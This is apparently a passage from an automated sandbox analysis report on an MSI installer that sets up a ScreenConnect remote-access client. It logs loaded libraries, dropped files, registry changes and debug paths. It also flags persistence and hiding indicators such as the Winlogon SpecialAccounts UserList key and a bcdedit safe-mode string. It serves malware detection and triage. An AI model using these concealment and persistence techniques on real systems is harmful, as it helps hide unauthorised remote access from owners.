                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: setup.msiStatic file information: File size 13422592 > 1048576
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743291281.00000000014D2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743239856.0000000001490000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1693323566.000000000058D000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1671136153.0000000004B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: setup.msi, MSI15E9.tmp.1.dr, 5c1176.rbs.1.dr, MSI160A.tmp.1.dr, 5c1175.msi.1.dr, MSI17FF.tmp.1.dr, 5c1177.msi.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
                        Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: setup.msi, 5c1175.msi.1.dr, MSID3F.tmp.0.dr, 5c1177.msi.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
                        Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745103235.000000001BA72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
                        Source: ScreenConnect.Client.dll.1.drStatic PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
                        Source: MSID3F.tmp.0.drStatic PE information: real checksum: 0x2f213 should be: 0x115ce6
                        Source: MSI17FF.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x3d8a7
                        Source: MSI160A.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x3d8a7
                        Source: ScreenConnect.WindowsAuthenticationPackage.dll.1.drStatic PE information: section name: _RDATA
                        Source: ScreenConnect.WindowsCredentialProvider.dll.1.drStatic PE information: section name: _RDATA
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_04E171A1 push esp; retf 3_3_04E17170
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_01531320 pushad ; retn 0003h6_2_01531321
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_01537754 push 8403CACFh; iretd 6_2_01537759
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_01537738 push eax; iretd 6_2_01537739
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0AFF8 push ebp; retf 6_2_03E0B03B
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0AFA0 push ebp; retf 6_2_03E0B03B
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0AE37 push edi; retf 6_2_03E0AE3B
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0B3DF push edx; retf 6_2_03E0B3E3
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0B31F push edx; retf 6_2_03E0B33B
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0B2C0 push ebx; retf 6_2_03E0B2D3
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0B21F push ebx; retf 6_2_03E0B233
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0B080 push ebp; retf 6_2_03E0B0D3
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E03BE8 push FFFFFFCDh; retf 6_2_03E03C5E
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E07A4C push FFFFFF8Fh; retf 6_2_03E07A5E
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0FF6A push es; retf 6_2_03E0FF6B
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0FF6C push es; retf 6_2_03E0FF83
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E0FEFC push es; retf 6_2_03E0FF53
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_051A0740 pushad ; ret 6_2_051A0753
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_051A4191 push esp; ret 6_2_051A41A3
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_051A10F7 push ss; retf 6_2_051A1106
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_056B27B2 push ss; retf 6_2_056B27BE
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_056B4D1F push ss; retf 6_2_056B4D2E
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B717D94 push ss; iretd 7_2_00007FFD9B717D95
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B72279F push ss; iretd 8_2_00007FFD9B7227A6
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B72AA06 push esi; ret 8_2_00007FFD9B72AA07
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B73106D push ebx; ret 8_2_00007FFD9B731072

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                        Source: c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-406f-012c01771397}\inprocserver32
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI160A.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI17FF.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI160A.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI17FF.tmpJump to dropped file
                        Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: rundll32.exe, 00000003.00000003.1668960516.0000000004CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743291281.00000000014D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743239856.0000000001490000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
